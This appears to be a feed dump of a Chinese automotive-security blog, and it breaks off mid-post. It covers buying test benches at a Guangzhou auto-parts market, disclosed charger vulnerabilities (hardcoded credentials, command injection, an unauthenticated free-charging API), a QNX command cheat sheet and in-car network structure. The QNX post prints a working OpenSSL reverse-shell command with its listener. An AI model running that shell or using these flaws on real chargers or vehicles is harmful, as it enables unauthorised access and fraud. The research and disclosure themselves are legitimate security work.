scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true"> </iframe>]]></content>
<summary type="html"><h2 id="车联网安全基础知识之USB-SPH2-0线束制作"><a href="#车联网安全基础知识之USB-SPH2-0线束制作" class="headerlink" title="车联网安全基础知识之USB SPH2.0线束制作"></a>车联网安全基础知识之USB </summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之测试台架采购</title>
<link href="http://delikely.github.io/2022/05/19/trail-of-chentian/"/>
<id>http://delikely.github.io/2022/05/19/trail-of-chentian/</id>
<published>2022-05-19T07:54:03.000Z</published>
<updated>2022-05-19T14:12:20.000Z</updated>
<content type="html"><![CDATA[<p>最近在广州出差,到广州花都(凯通)汽配城逛了一圈。之前研究需要也弄过一些台架,搭建台架确实让人头大,特别是还要带漏洞的。今天就和大家聊一聊测试件购买的三两事儿。</p><h3 id="汽车界”华强北”一日游"><a href="#汽车界”华强北”一日游" class="headerlink" title="汽车界”华强北”一日游"></a>汽车界”华强北”一日游</h3><p>首先为什么是<code>广州花都(凯通)汽配城</code>一日游,它有什么神秘之处? 它是国内最大的汽配城,总共约有1500个铺位。<code>花都汽配城</code>的前身是非常知名的<code>陈田汽配城</code>(号称汽车界<code>华强北</code>),陈田汽配城拆迁后,超过8成的商户都搬迁到了花都汽配城。虽然陈田在2019年由于陈田村改造而落幕,但江湖上还流传着不少陈田的传说。</p><blockquote><p>拿着方向盘进陈田,你可以开走一辆法拉利。</p></blockquote><blockquote><p>据说,德国著名汽车杂志《AutoBild》有一辆宝马320d GT的长测车。后来,这辆车的中控屏幕、中控总成和导航主机在汉堡被偷走了。不过,德国人为主机加装了一套GPS定位系统,可在中控屏幕被偷了之后实时查看它的位置。后来,德国人发现这套防盗GPS系统定位在哪了?没错,就是陈田。71天,这中控屏经历了一场18000公里的神奇旅程。</p></blockquote><p>正是由于这些传说,我注意到了陈田。而巧合的是近期也有采购需求,我最近又在广州出差,于是周六约了的本地朋友去一探个究竟。</p><p>花都汽配城在广州花都区,从白云机场出发往北十多公里就此行的目的地。</p><p><img src="640.jpeg" alt="img"></p><p>从地图上可以看到汽配城中还标记着<code>广州陈田拆车件档</code>,当时我一下车就直奔而去,却不巧的是该店铺正在装修中。但我们依旧上前去询问有网联件卖没有,得到了否定的答案,我们悻悻而归,于是一个店一个店去寻找。逛了2个多小时,终于全部走了一圈。发现两个特点第一这里面<strong>主营国外品牌豪华车的零部件,国内车的零部件极少</strong>。第二、这里依然<strong>以传统零部件为主,新能源车中的网联件较少</strong>。对于安全研究而言,这次旅程颇为失望,本以为是拿着麻袋随便装,最后却只是精挑细选了两个件儿。出现这样的原因或是因为网联车还比较新,拆车件较少,暂未形成市场规模;再者,对于改装,网联件不是改装的重点等诸多因素影响的结果。伴随着智能网联车占比不断提升,相信网联件的占比会不断提升。</p><p>虽然网联件很少,但这里是动力调校、防盗匹配的梦想之都,仍然值得探索。来看一看他们的办公环境,是不是和各位大佬的实验台颇有几分相似之处——脏乱但实用。</p><p><img src="image-20220516000501506.png" alt="image-20220516000501506"></p><h3 id="测试台架购买"><a href="#测试台架购买" class="headerlink" title="测试台架购买"></a>测试台架购买</h3><p>大家做研究都有测试台架的需求,购买测试用的台架既要考虑台架的功能也要考虑成本,是一个费时费人的活儿。</p><p>虽然标题写的是台架购买,但这是很理想的情况,能够直接购买到测试台架。但现实的情况是购买单个零部件,自己解决或找人解决连线问题。对于车联网安全研究,有时需要整车台架;有时需要单个零部件的测试台架;有时需要特定车型的特定部件。需求是各式各样,给采购出了不少难题。下面和大家分享一些经验。</p><p><img src="image-20220516011218127.png" alt="image-20220516011218127" style="zoom:50%;" /></p><h4 id="购买渠道"><a href="#购买渠道" class="headerlink" title="购买渠道"></a>购买渠道</h4><ul><li><p>汽配城</p><p>汽配城中的零部件种类多,但大部分以机械件为主,服务于汽车改装。好处是能与人面对面交流,价格也相对比较便宜。</p><p>去汽配城最好有熟人带,前几年去北京的汽配城没人搭理,问就是没有。但巧合的是,同事的广东口音帮了大忙,一个店铺的老板听出了是老乡,这样才搭上线。这次在花都汽配城,这里的人相比之前在北京的汽配城来说热情很多。这也是我为什么要拉着一个本地人一块去原因,还是圈子文化,或者这里网联件也不少,只是打开的姿势不对。<img src="640-16529689730673.jpeg" alt="img"></p></li><li><p>4S店/汽修店</p><p>4S店/汽修店 从上游(供应商)中拿货,零部件的质量高,但价格比较昂贵。但是他们也是最不好打交道的,对于我们的稀奇古怪的需求他们往往是一言以拒之。</p></li><li><p>闲鱼</p><p>闲鱼上就要碰运气了,卖家大多也是汽配城的店主,问到技术问题大部分直接就是<strong>要什么件,给我零部件号,其他的不懂</strong>。很难找到懂点技术的人,只能走量,看运气。闲鱼上汇集了全国的卖家,可选择性更高。但也要注意防止被骗,在花都汽配城是不允许拍摄店铺门面的照片的,这里的保安说很多人拍了人家的门面去网上骗人。很多店家标价很低,备注有需要留言,一般还卖的蛮贵的。还是那种明码标价的好,一口价爽快。但也要注意砍价,如果标价较高可以直接5折来砍。</p><p><img src="640-16529689730674.jpeg" alt="img" style="zoom:25%;" /></p></li><li><p>教具厂商</p><p>从汽修教具生产厂家手中购买,他们通过组装拆车件制作教具。优点美观,产品成熟;缺点定制化程度低,价格贵。</p><p><img src="640-16529689730675.jpeg" alt="img"></p></li></ul><p><strong>价格由低到高排序</strong>:闲鱼->汽配城->教具厂商->4S店/汽修店</p><p><strong>集成度由高到低排序</strong>:教具厂商->汽配城->闲鱼->4S店/汽修店</p><h4 id="叫法差异"><a href="#叫法差异" class="headerlink" title="叫法差异"></a>叫法差异</h4><p>去淘件的时候,想要<strong>TBOX</strong>和<strong>车机</strong>,在咸鱼上搜出来的量很少;在线下你说TBOX,他们会两眼瞪着你——什么是TBOX。这时就需要知道不同领域对同一部件的不同叫法。以TBOX和车机为例。</p><ul><li><p>汽车圈一般把<code>TBOX</code>称之为<code>无线终端</code>、<code>紧急呼叫模块</code>等。</p></li><li><p>汽车圈一般把<code>车机(IVI)</code>称之为<code>导航主机</code>、<code>中控屏</code>等。</p></li></ul><p>使用汽车圈常用的名词代替我们常用的名词,能够更好的和卖家沟通,提高效率。</p><h4 id="难点"><a href="#难点" class="headerlink" title="难点"></a>难点</h4><p>制作台架也面临一些难题,对于这些难题我进行了总结,也给出了一些建议。</p><ol><li><strong>线束:</strong>如果是要更复杂的台架,线束错综复杂,还是要专业人士来做,我们搞安全做不了的原因是没有线束、接插件等,更不了解接插件线束定义与连接。三两个零部件的台架,我们还行,更多件或者全车电器我们就无能为力了。</li><li><strong>上电</strong>:采购的难点是零部件好买,但是大部分零部件就只是部件,线束需要自己连接,上电的问题需要自己解决。如果购买TBOX或车机单个部件,线束可以用杜邦线等替代,上电问题可以通过分析硬件(根据电源芯片分析)解决。</li><li><strong>接插件定义:</strong> 接插件定义,可以采用两种方式获得,人工分析,使用万用表、逻辑分析仪等设备识别(后期后专门写一篇文章来讲);查资料,去汽车维修网站,找对应车型的电路图。</li><li><strong>发票:</strong>大部分店家提供不了发票,这个需要我们自己找票来抵。</li><li><strong>APP账号:</strong> 台架需要与手机APP联动,分析控制报文,部分品牌的车型可通过闲鱼绑定激活。</li></ol><h3 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h3><p>测试台架对于安全研究和展示极为重要,对于甲方来说可能只是一句话的事儿,但对于我们乙方来说还是不小的挑战,能够弄一套类似 “DVWA”理念的测试台架是最终理想。</p><p>闲鱼看到了一个卖家,提供车联网安全研究定制台架服务,看着好神奇。</p><p><img src="image-20220516011003501.png" alt="image-20220516011003501"></p><p>最后,欢迎分享、交流淘件经验。</p>]]></content>
<summary type="html"><p>最近在广州出差,到广州花都(凯通)汽配城逛了一圈。之前研究需要也弄过一些台架,搭建台架确实让人头大,特别是还要带漏洞的。今天就和大家聊一聊测试件购买的三两事儿。</p>
<h3 id="汽车界”华强北”一日游"><a href="#汽车界”华强北”一日游" class="h</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>充电桩漏洞挖掘实践</title>
<link href="http://delikely.github.io/2022/04/29/chargebox-vuln-hunter-garo-and-bender/"/>
<id>http://delikely.github.io/2022/04/29/chargebox-vuln-hunter-garo-and-bender/</id>
<published>2022-04-29T11:47:40.000Z</published>
<updated>2022-05-19T13:50:00.000Z</updated>
<content type="html"><![CDATA[<p>半年前写过一篇名为的 <a href="https://delikely.github.io/2021/10/20/Charging-infrastructure/">车联网安全基础知识之充电基础设施</a> 概述文章,阐述了充电网络的结构与安全威胁。在写文章的时候研究了多款国外充电桩,挖掘了5个高危漏洞。将漏洞报送给相关方并协助进行漏洞修复工作。Bender 近日完成了漏洞处理,发布了漏洞公告。现在和大家分享下其中的部分漏洞。</p><h3 id="寻找研究对象"><a href="#寻找研究对象" class="headerlink" title="寻找研究对象"></a>寻找研究对象</h3><p>在寻找研究对象的时候,发现国外不少充电桩有独立IP,暴露在公网。国内的充电桩暴露在公网的较少。于是选择了国外充电桩作为研究对象。虽然从充电桩查找网站上可以找到很多的充电桩,但这些大多是按照运营商来划分的,无法定位到充电桩的制造商。</p><p><img src="image-20220428143421195.png" alt="image-20220428143421195"></p><p>于是,换了一种思路。到充电桩联盟上去找有哪些充电桩制造与运营企业。幸运的是,很快就发现了 Ebee(本德尔子公司)。<img src="image-20220428144305061.png" alt="image-20220428144305061"></p><p>在上述表中确定了,研究的范围。接下来需要找到具体的研究型号。在研究之前需要拿到固件,有些充电桩的固件是难以获取的,最终根据固件获取的难以程度确定了两个研究对象,Ebee(Bender) 与 Garo AB。他们有远程研究的两个共同的特征,公网可访问、固件可获取。虽然GARO没有在上述联盟中,后文会讲述到通过供应链关系,我们是如何找到 GARO 并展开研究的。</p><blockquote><p>Bender 本德尔创建于1946年,总部位于德国,是专业从事低压系统漏电保护技术的专业厂商。德国本德尔公司早在上世纪八十年代即进入中国大陆市场。产品的应用领域涵盖了电动或混动汽车、能源生产和分配、可再生能源和建筑物技术以及其他各种工业领域的应用。Ebee 本德尔子公司,专注于充电桩控制器开发,为多个品牌充电桩提供充电控制器。</p></blockquote><blockquote><p>Garo AB 集团创建于 1939 年,总部位于瑞典。专注于新能源领域,2016年登陆 Nasdaq。 </p></blockquote><h3 id="Bender-CC系列充电控制器存在多个漏洞"><a href="#Bender-CC系列充电控制器存在多个漏洞" class="headerlink" title="Bender CC系列充电控制器存在多个漏洞"></a>Bender CC系列充电控制器存在多个漏洞</h3><p><img src="Laderegler-Produktgruppe.jpg" alt="img"></p><p>EBEE CC系列充电控制器为 GARO、ENSTO、Bender 等企业的充电桩核心部件。充电控制器是充电桩的大脑,与上层通信负责远程连接云服务进行远程远控,下端与电气设备相连管控与汽车之间的充电。</p><blockquote><p>充电控制器监视充电系统内部硬件,如仪表、用户接口板或插座。它的特点是紧凑的设计和尺寸,从而使充电系统智能化、小型化和减少成本。为了确保充电控制器能够通信,需要一个后端系统。鉴于大多数后端供应商严格坚持开放充电点协议(OCPP),充电控制器OCPP1.5和OCPP1.6兼容。所有在OCPP中特定的消息支持,以及一些供应商特定的扩展基于数据传输的消息。与供应商后端实现的集成测试,例如Vattenfall、Bosch、NTT和DRIIVZ已经成功执行。充电控制器可以作为一个始终连接到移动网络的系统运行。控制器支持2.5G 移动和4G UMTS移动网络。在线操作的连接要求SIM卡(不包括在交付中)。使用RFID模块,包括RFID读卡器和LED,可以方便地进行用户交互。充电是通过持有一个有效的RFID卡靠近阅读器开始的。在离线操作中,充电控制器无需授权可以随意充电,也可以基于RFID和授权的RFID卡授权本地白名单用户。</p></blockquote><p>Ebbe 官网上并没有提供固件,我们根据充电桩的指纹特征找到使用 CC612 的另外一个厂商,该厂商固件不但可以下载,还提供了一些开发文档。这些开发文档,在我们的研究过程中起到了很多大的帮助。</p><h4 id="CVE-2021-34601"><a href="#CVE-2021-34601" class="headerlink" title="CVE-2021-34601"></a><a href="https://cert.vde.com/en/advisories/VDE-2021-047/#cvedetails-CVE-2021-34601">CVE-2021-34601</a></h4><p>从固件中发现存在 SSH 硬编码,但用户的权限为普通权限。利用 CVE-2021-34602 可以实现权限提升。</p><p><img src="image-20220428145929244.png" alt="image-20220428145929244"></p><p><a href="https://cert.vde.com/en/advisories/VDE-2021-047/#cvedetails-CVE-2021-34602">CVE-2021-34602</a></p><p>使用 CVE-2021-34601 硬编码, 进入系统后发现了明文存储的 WEB 后台的账号与密码。并且普通用户也能够查看。登录后发现了存在命令注入漏洞。</p><p><img src="image-20220428150416046.png" alt="image-20220428150416046"></p><h3 id="GARO-存在多个漏洞"><a href="#GARO-存在多个漏洞" class="headerlink" title="GARO 存在多个漏洞"></a>GARO 存在多个漏洞</h3><p>研究这个漏洞是因为 ebbe 影响了 Garo A8 充电桩,但在验证的时候发现,GARO 其他型号的充电桩不受影响,特别是看到有些部分充电桩WEB后台甚至没有启用任何身份保护机制。在浏览后台管理系统的时候,在软件升级页面获取到了固件。</p><p>GARO Wallbox GLB/GTB/GTC 使用的 WiFi 模块(也充当主控TCU)是基于树莓派开发的。</p><p><img src="image-20220428154315145.png" alt="image-20220428154315145"></p><p>在 GARO 发现了多个漏洞,已分配三个CVE编号 CVE-2021-45876、CVE-2021-4587、CVE-2021-45878。</p><blockquote><h4 id="1-Without-Authentication-CVE-2021-45878"><a href="#1-Without-Authentication-CVE-2021-45878" class="headerlink" title="1. Without Authentication(CVE-2021-45878)"></a>1. Without Authentication(CVE-2021-45878)</h4><p>Lack of access control on the web manger pages that allows any user to view and modify information.</p><h4 id="2-Hard-Coded-Credentials-for-Tomcat-Manager-CVE-2021-45877"><a href="#2-Hard-Coded-Credentials-for-Tomcat-Manager-CVE-2021-45877" class="headerlink" title="2. Hard Coded Credentials for Tomcat Manager(CVE-2021-45877)"></a>2. Hard Coded Credentials for Tomcat Manager(CVE-2021-45877)</h4><p>A hardcoded credential in <code>/etc/tomcat8/tomcat-user.xml</code>, which allows attackers to gain authorized access and control the tomcat completely; Normal user can’t be modified or deleted the account .</p><h4 id="3-Unauthenticated-Command-Injection-CVE-2021-45876"><a href="#3-Unauthenticated-Command-Injection-CVE-2021-45876" class="headerlink" title="3. Unauthenticated Command Injection(CVE-2021-45876)"></a>3. Unauthenticated Command Injection(CVE-2021-45876)</h4><p>The <code>url</code> parameter of the function module <code>downloadAndUpdate</code> is vulnerable to an command Injection. Unfiltered user input is used to generate code which then gets executed when downloading new firmware.</p></blockquote><p>特别需要注意的是,未授权用户能够调用API <code>/freecharge</code> 接口实现免费充电。</p><p><img src="image-20210919170834915.png" alt="image-20210919170834915"></p><h3 id="供应链安全"><a href="#供应链安全" class="headerlink" title="供应链安全"></a>供应链安全</h3><h4 id="ebbe-充电桩控制器漏洞影响面"><a href="#ebbe-充电桩控制器漏洞影响面" class="headerlink" title="ebbe 充电桩控制器漏洞影响面"></a>ebbe 充电桩控制器漏洞影响面</h4><p>根据 ebbe 官网介绍,CC612充电控制器隶属于 Bender 集团。</p><p><img src="image-20210717101441288.png" alt="image-20210717101441288"></p><p>从固件中发现,除了用户使用的页面意外还有其他隐藏的管理页面。包括操作员/operator、制造外/manufacturer 外,以及一个开发页面/dev。</p><p><img src="image-20220428151537682.png" alt="image-20220428151537682"></p><p>根据如上的隐藏页面的充电桩 WEB 后台的指纹特征,确认受影响的充电桩包括:</p><ul><li>Garo A8</li><li>Bender GmbH Co. KG CC612_2S0R</li><li>Chago(ENSTO) EVB100</li><li>etc</li></ul><h4 id="GARO-log4j漏洞影响"><a href="#GARO-log4j漏洞影响" class="headerlink" title="GARO log4j漏洞影响"></a>GARO log4j漏洞影响</h4><p>GARO Wallbox GLB/GTB/GTC 使用了 log4j 组件,在 log4j 曝出漏洞中我们对该充电桩进行了验证, 虽然最终验证不受影响,但充电领域的软件供应链也应引起关注。</p><p><img src="image-20220428155427689.png" alt="image-20220428155427689"></p><h4 id="漏洞管理"><a href="#漏洞管理" class="headerlink" title="漏洞管理"></a>漏洞管理</h4><p>ebbe 作为充电控制器供应商,产品的漏洞会影响使用了此款充电控制器的所有充电桩。这对应的是<strong>闭源软件</strong>供应链安全。</p><p> log4j 影响十分巨大,但如何确定自己的产品是否受到影响,这是一个很难回答的问题。这对应的是<strong>开源软件</strong>供应链安全。</p><p>从对以上充电桩漏洞挖掘的经历,我们意识到了<strong>开源与闭源软件供应链</strong>对车联网安全影响程度之深。为解决车联网中软件供应链安全问题,不久之后,我们将推出<strong>车联网漏洞管理(协作)平台</strong>,敬请期待。</p><h3 id="收到致谢"><a href="#收到致谢" class="headerlink" title="收到致谢"></a>收到致谢</h3><p>BENDER/EBEE 与 CERT@VDE 联合发布漏洞公告中对 <strong>奇安信星舆实验室</strong> 进行了致谢。</p><p><img src="image-20220428153411278.png" alt="image-20220428153411278"></p><h3 id="相关连接"><a href="#相关连接" class="headerlink" title="相关连接"></a>相关连接</h3><ul><li><a href="https://cert.vde.com/en/advisories/VDE-2021-047/">VDE-2021-047 | CERT@VDE</a></li><li><a href="https://delikely.github.io/2021/10/20/Charging-infrastructure/">车联网安全基础知识之充电基础设施</a></li><li><a href="https://github.com/delikely/advisory/tree/main/Bender">Multiple Vulnerabilities in Bender/Bee Charge Controller</a></li><li><a href="https://github.com/delikely/advisory/tree/main/GARO">Multiple Vulnerabilities in GARO Wallbox</a></li></ul>]]></content>
<summary type="html"><p>半年前写过一篇名为的 <a href="https://delikely.github.io/2021/10/20/Charging-infrastructure/">车联网安全基础知识之充电基础设施</a> 概述文章,阐述了充电网络的结构与安全威胁。在写文章的时候研究了</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之QNX Command Cheatsheet</title>
<link href="http://delikely.github.io/2022/02/28/QNX-Command-Cheatsheet/"/>
<id>http://delikely.github.io/2022/02/28/QNX-Command-Cheatsheet/</id>
<published>2022-02-28T15:15:00.000Z</published>
<updated>2022-02-28T16:03:22.819Z</updated>
<content type="html"><![CDATA[<h2 id="QNX-命令备忘录"><a href="#QNX-命令备忘录" class="headerlink" title="QNX 命令备忘录"></a>QNX 命令备忘录</h2><blockquote><p>QNX 是加拿大 RIM 公司旗下,采用微内核的类Unix实时操作系统。其以安全性和实时性著称,主要是面向嵌入式系统。QNX 在汽车领域市场占有量较大,大多数汽车制造商均有使用,多做为车机和仪表底层操作系统。</p></blockquote><p>最近发现不少小伙伴在研究 QNX 车机,其中有部分人是第一次接触 QNX,相信后面会有越来越多的人会接触到QNX。由于 QNX 是遵从 POSIX 规范的类 Unix 实时操作系统,简单操作上手难度不大,但有一些命令与大家熟知的LINUX还是有差异的。自己最近也在研究 QNX,遇到了不大少的坑,为方便大家使用,特别制作 QNX 命令备忘录。现在发布第一版V0.1,其中可能存在不少纰漏,欢迎反馈。</p><h3 id="QNX-Trick"><a href="#QNX-Trick" class="headerlink" title="QNX Trick"></a>QNX Trick</h3><p>以下是 QNX Command Cheat Sheet 中比较有意思的三个命令。</p><ol><li><p>use</p><p>在 Linux 中这么一句话——有困难找 “男人”。指的是在 Linux 中不清楚一个命令的作用和用法时,通常会使用 man 命令获取使用帮助。但在 QNX 不仅找 man 没有用, -h/-help 对大多数命令也不起作用。那么 QNX 中该怎么获取命令帮助,其实 use 就是 QNX 的 -h/–help。当忘记某个命令的用法时,记得使用 <code>use command(需要查询的命令)</code>获取帮助信息。</p></li><li><p>查询端口对应的进程名</p><p>QNX 中 <code>netstat</code> 没有 <code>-p</code> 选项,<code>netstat -p</code> 就没有用了。那么怎么来查询呢,目前发现有两个命令 (<code>sockstat</code> 和 <code>pidin</code>)可以用来查询。如下使用 <code>sockstat</code> 和 <code>pidin fds</code>都能查询到 8000 端口是 qconn 程序占用的。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># sockstat</span></span><br><span class="line">USER NODE:CMD PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS</span><br><span class="line">root dhcp.clien 135187 3 udp *.* *.*</span><br><span class="line">root qconn 184342 3 tcp *.8000 *.*</span><br><span class="line">root inetd 200729 4 tcp *.ftp *.*</span><br><span class="line">root inetd 200729 5 tcp *.telnet *.*</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># pidin fds</span></span><br><span class="line"> 184342 usr/sbin/qconn </span><br><span class="line">true 0 1 </span><br><span class="line">true 1 4103 rw 0 /dev/con1</span><br><span class="line">true 2 4103 rw 0 /dev/con1</span><br><span class="line">true 3 102414 rw 0 I4TCP *.8000 *.* LISTEN</span><br><span class="line">true 4 184342 </span><br><span class="line">true 0s 1 </span><br><span class="line">true 2s 1 MP 0 /dev/dbgmem</span><br><span class="line">true 4s 1 MP 0 /dev/profiler</span><br><span class="line"></span><br></pre></td></tr></table></figure></li><li><p>反弹 Shell</p><p>QNX 反弹 Shell 比较受限,大部分情况下没有 nc/netcat,也没用到 busybox,就连常用的下载命令wget、curl 也没有。能执行任意命令却拿不到反弹 Shell,就很让人抓狂。那么是否有通用的反弹shell方法,我还真找到了一个冷门的反弹 shell 方法,现在分享给大家,Linux 和 QNX 上都能使用。</p><p>现在大家越来越注重安全,Openssl 使用也相当广泛。Openssl 是一个很好的工具,降低了大家使用加解密的门槛。Openssl 一般用来加解密,很少被注意到其实还能进行网络通信。Openssl 的 s_client 是一个SSL/TLS客户端程序,与 s_server 对应,它不仅能与 s_server 进行通信,也能与任何使用ssl协议的其他服务程序进行通信。利用这一特性可以实现反弹 shell。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 监听</span></span><br><span class="line">openssl s_server -quiet -key server.key -cert server.pem -port 4444 </span><br><span class="line"><span class="comment"># 目标端 </span></span><br><span class="line">mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.7.1:4444 > /tmp/s; rm /tmp/s </span><br></pre></td></tr></table></figure><h3 id="Command-Cheat-Sheet"><a href="#Command-Cheat-Sheet" class="headerlink" title="Command Cheat Sheet"></a>Command Cheat Sheet</h3><p> 更多请下载 <a href="https://github.com/delikely/Wiki/blob/main/cheatsheet/QNX/QNX Command Cheatsheet V0.1.png">QNX Command Cheat Sheet</a> “食用”。</p><p><img src="QNX-Command-Cheatsheet.png" alt="QNX Command cheatsheet"></p></li></ol><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><a href="http://www.qnx.com/developers/docs/6.5.0/index.jsp?topic=%2Fcom.qnx.doc.neutrino_utilities%2Fabout.html&cp=13_12_0">Utilities Reference</a></li><li><a href="https://devhints.io/adb">devhints.io</a></li></ul>]]></content>
<summary type="html"><h2 id="QNX-命令备忘录"><a href="#QNX-命令备忘录" class="headerlink" title="QNX 命令备忘录"></a>QNX 命令备忘录</h2><blockquote>
<p>QNX 是加拿大 RIM 公司旗下,采用微内核的类Unix</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之从插线端子分析车内通信网络结构</title>
<link href="http://delikely.github.io/2021/11/18/Vehicle-Cable-Connection-Terminal/"/>
<id>http://delikely.github.io/2021/11/18/Vehicle-Cable-Connection-Terminal/</id>
<published>2021-11-19T02:14:59.000Z</published>
<updated>2021-11-20T04:33:24.475Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>在不久之后实验室计划拆车,研究车辆的组成结构。拆车是很容易的,但拆完之后能原封不动的装回去且能正常运行还是需要功夫的。正好拿到了一辆车完整的电路图,于是准备研究一下,为后面拆车做准备,免得到时一头雾水。之前也有对插线端子进行过逆向分析,在一堆接口中寻找CAN 、UART 、USB 等接口。在没有手册的条件下,完整逆向出来还是有一定难度的。此外,在自己搭建测试台架中也需要熟悉各个 ECU 和各线束上的接线端子,接下来就请跟随我进入到汽车内部看一看 ECU 的接线端子。</p><h3 id="插线端子"><a href="#插线端子" class="headerlink" title="插线端子"></a>插线端子</h3><p>通过插线端子看车内的网络结构,向下看各 ECU 与其他 ECU 或传感器之间的连接方式、通信方案等;向上分析个 ECU 所在的网络域,梳理车内网络结构。</p><p>下面以不同网络为分类,解读各 ECU 的插线端子的用途,最后以 CAN 网络为主线梳理出整车网络拓扑。</p><h4 id="网关"><a href="#网关" class="headerlink" title="网关"></a>网关</h4><p>网关是整个网络中的核心,控制多路CAN、以太网网络的各类消息的处理和转发。网关最重要的功能是将不同的网络域进行隔离。从网关的插线端子来看,内部CAN网络被划分了为 6 个网络。分别是 DiagBUS(诊断)CAN、TBUS(远程监控)CAN、CBUS(底盘)CAN、EBUS(车身)CAN、IBUS(信息娱乐)CAN、EVBUS(能量)CAN。下面按照这 6 个网络分析车内网络结构。</p><p><img src="image-20211111230110482.png" alt="image-20211111230110482"></p><h4 id="TBUS-远程诊断网络"><a href="#TBUS-远程诊断网络" class="headerlink" title="TBUS 远程诊断网络"></a>TBUS 远程诊断网络</h4><p>TBUS 中只有 T-BOX 一个ECU。T-BOX 是车端智能网联中最核心的部件之一,集成 GPS、外部通信接口、电子处理单元、微控制器、移动通信单元和存储器等功能模块。提供的功能有网络接入、OTA、远程控制、位置查询/车辆追踪、电池管理、位置提醒、eCall、远程诊断、平台监控/国家监管等。下图中插线端子上 CAN、SPK、MIC、唤醒信号灯等接口。T-BOX 通过 TBUS CAN 与网关相连;T-BOX 上的 SPK(扬声器) 与 MIC(麦克风) 用于<a href="https://delikely.github.io/2021/08/15/TBOX-Main-Function/#eCall">紧急呼叫</a> 等服务。除了下图的接口外,其他车的 T-BOX 可能还有用于模拟以太网的 USB 端子、用于调试的 UART 串口等。</p><p><img src="image-20211111225448841.png" alt="image-20211111225448841"></p><h4 id="EVBUS-能量域-动力域"><a href="#EVBUS-能量域-动力域" class="headerlink" title="EVBUS 能量域/动力域"></a>EVBUS 能量域/动力域</h4><p>EVBUS 能量域是电动汽车新能源的叫法,对应传统网络中的动力域。能量域主要的功能是给车载电池充电以及控制驱动电机为车辆供能。能量域中有 BMS 电池管理系统、MCU 驱动电机控制器、OBC 车载充电控制器、CMU 交流充电控制单元、电子水泵控制器等。</p><h5 id="BMS-电池管理、快充、慢充系统"><a href="#BMS-电池管理、快充、慢充系统" class="headerlink" title="BMS 电池管理、快充、慢充系统"></a>BMS 电池管理、快充、慢充系统</h5><p>电动汽车的动力输出依靠电池,而电池管理系统BMS(Battery Management System)则是其中的核心,负责控制电池的充电和放电以及实现电池状态估算等功能。电池管理系统与电动汽车的动力电池紧密结合在一起,通过温度传感器进行实时检测,还进行热管理;通过 EVBUS 与车载总控制器、电机控制器、能量控制系统、车载显示系统等进行实时通信。充电方式有快充(直流)和慢充(直流)两种。在快充网络中,BMS 充当 EVBUS 与 FCBUS 之间的网关;在慢充网络中,BMS 通过控制 CMU 控制对电池的慢充。</p><p><img src="image-20211112110531547-16367183183121.png" alt="image-20211112110531547"></p><h5 id="WEP-FD-电机水泵控制器"><a href="#WEP-FD-电机水泵控制器" class="headerlink" title="WEP-FD 电机水泵控制器"></a>WEP-FD 电机水泵控制器</h5><p>电机水泵控制器控制电机水泵为电机电控散热提供冷却水循环和风冷,通过 CAN 总线接入能量域。</p><p><img src="image-20211112104532040.png" alt="image-20211112104532040" style="zoom:50%;" /></p><h4 id="CBUS-底盘域"><a href="#CBUS-底盘域" class="headerlink" title="CBUS 底盘域"></a>CBUS 底盘域</h4><p>底盘域为整个底盘系统的协调者,即是将车辆运动控制进行总体把控。接入到 CAN 网络底盘域中的控制器包括 ABS 防抱死制动系统、EPB 电子驻车制动控制器、EPS 电动助力转向系统、P 档控制器、ESK 档位控制器、VBP 真空泵控制器等。</p><h5 id="ABS-防抱死制动系统"><a href="#ABS-防抱死制动系统" class="headerlink" title="ABS 防抱死制动系统"></a>ABS 防抱死制动系统</h5><p>ABS(Antilock Brake System) 防抱死制动系统是在汽车制动时,自动控制制动器制动力的大小,使车轮不被抱死,处于边滚边滑(滑移率在20%左右)的状态,以保证车轮与地面的附着力在最大值。ABS 采集四个轮子上的转速传感器信号,自动控制制动器制动力的大小,防止车辆抱死。</p><p><img src="image-20211112115057877.png" alt="image-20211112115057877"></p><h5 id="EPB-电子驻车制动控制器"><a href="#EPB-电子驻车制动控制器" class="headerlink" title="EPB 电子驻车制动控制器"></a>EPB 电子驻车制动控制器</h5><p>EPB(Electrical Park Brake) 电子驻车制动系统既通常所说的电子手刹,采用电子控制的方式来完成驻车制动。EPB 驻车通过控制四个EPB电机完成驻车制动。</p><p><img src="image-20211112113135506.png" alt="image-20211112113135506"></p><h5 id="EPS-电动助力转向系统"><a href="#EPS-电动助力转向系统" class="headerlink" title="EPS 电动助力转向系统"></a>EPS 电动助力转向系统</h5><p>EPS(Electric Power Steering) 电动助力转向系统是依靠电机提供辅助扭矩的动力转向系统。EPS 根据驾驶员意图和车辆的运行工况而进行助力的转向系统。EPS 的控制过程是动力转向系统综合控制的过程,通过底盘域CAN网络与其他电子控制器进行通信。</p><p><img src="image-20211112113631841.png" alt="image-20211112113631841"></p><h5 id="P-档控制器"><a href="#P-档控制器" class="headerlink" title="P 档控制器"></a>P 